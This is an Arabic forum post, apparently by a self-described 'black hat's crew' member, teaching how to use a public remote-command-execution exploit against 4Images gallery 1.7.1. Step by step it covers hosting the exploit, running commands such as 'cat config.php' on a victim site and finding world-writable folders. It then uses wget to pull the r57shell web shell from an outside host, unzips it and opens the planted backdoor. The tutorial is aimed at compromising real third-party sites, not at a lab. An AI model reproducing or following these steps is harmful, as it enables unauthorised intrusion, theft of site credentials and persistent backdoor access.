--------------------------------------------------------------------------------
الـسلام عليكم ورحمـة الله وبــركاته
بندخل بالموضوع بدون مقدمات ( بالعربي ماعندي شي اقوله ) :D
طيب اول شي كيف تعرف انها php ?
بتـلقاء اول الكـود حق الثغـره مكتـوب كذا
كود PHP:
<?php
طيـب آستغلال الثغـرات هذي تـحفظهـا بآمتداد php وتـرفعه على موقـع , مثـل ليوكس او غيره ,
طيـب بناخـذ ثغرة
كود:
4Images <= 1.7.1 remote commands execution through arbitrary local
الثــغره في البــوٍوٍم الصـور 4Images الاصــدار : 1.7.1
طيــب هــذآ سورس الثغــره الي نـزل في مـواقع السكـيورتي ,
http://www.milw0rm.com/exploits/1533زي ماشفنـا في بـداية الكـود <?php اوكـ, الحـين احـفظ الثغـره في جهـازك وانا سميتها كذا saudi.php
لاحظ الامتداد الي حطـيته php ورح ارفــعها على موقع يقبل هالامتــداد , وانـا رفعتـها على مـوقع وهـذا رابط الثغـره ,
http://www.web4new.com/gallery/saudi.php طبـعا الطـلبات واضـحه ,,
اول خيــآر : رابــط المـوقع واحط مثــال هو ,
www.sitename.comثــآني خيآر : آســم المجلد ع المـوٍوٍقـع , وحــاط مثـال هو /4images/ or just او غيـره
ثـالث خيـآر : (آمــر لينكس او ويندوز) وحــاط مثال هـو specify a command ("cat config.php" ,
وامـر لينكس مهــمه جـدا والكل لازم يعـرفها او يآخذ نبذه بسيـطه عنـها عشـان يعرف يتعـامل مع هالنظام ,
طبعا احنا اخذنا الخيارات المهمه اول ثلاث خيارات الي حـاط عليــها * نجمه ,
طيب بنطـبق على مـوقع مصـاب ونــشوف
زي ماشفنا في الصـوره كتـبت الامـر ls -l وهو لـعرض الملفات مـع تصاريحها ,
وهـذي هي المـلفات طيــب الحيـن نشوفلنا ملف تصريحه 777 ومـلف data تصريحه 777 زي مانشـوف في الصوره
بس الملف الي احنا علي تصريحه 777 اكتـب بدال الامر ls -l الامر هذا which wget وبيقــولك !/usr/bin/wget
يعنــي تقــدر تـرفع طيب تمـام الحيــن نرفع لنـا شل ,
زي ماشفــناء في الصـوره كتـبت كـذا
كود:
wget
http://www.web4new.com/gallery/r57shell.zipwget = آمــر الرفع والرابــط رآبـط الشل ,
وآظغــط (GO)
طـيب الحيــن عشــان تتآكد انه ارتـــفع روح واكتـب الامر ls -l وبتـشوفه مع المـلفات ,
كـل شي تمام طيب الحين تفـك الظغـط عن الشـل ,
unzip = امـر فك الظـغط
r57shell.zip = المـلف الي رفعناه ,
ولاحـظ الصوره بعد ماظغطنــاء go , فـك الظغـط , وطـلع الملف r57shell.php ,
وهــذي صـوره توضــح ..
خــلاص الحـين كل شي تــمام تشــوف مســارك ويـن ,
pwd : امـر يحدد مسـارك ع السيرفر ,
زي ماشفـنا في الصــوره عطانا المسـار الي احنـاء فيه ,
كود:
/home/mubailes/public_html/main
فــي المجلد الرئيسي تبع الموقع في مجلد main يعني هنا بيكون الشل
www.xxxx.com/main/r57shell.php ,
وهــذي الصــوره بعد دخــولنا ع الشــل ,
وبكــذا ان شاء الله نكون عـرٍرٍفنا كيف نستغـل ثغـرات الـ php واخذنـا الثغـره هذي كمثــال ,
واكيــد كل ثغـره يفرق استثماره عن الثاني وان شاء الله يكون الـدرس واضـح واي سـؤال انا حاظـر ,
والسـلام عليكم ورحمة الله وبـركاته ,, :D
التوقيع
سنعود قريبا إن شاء الله
أدعولي بالتوفيق
nick : devil-x , team : black hat's crew , age : 19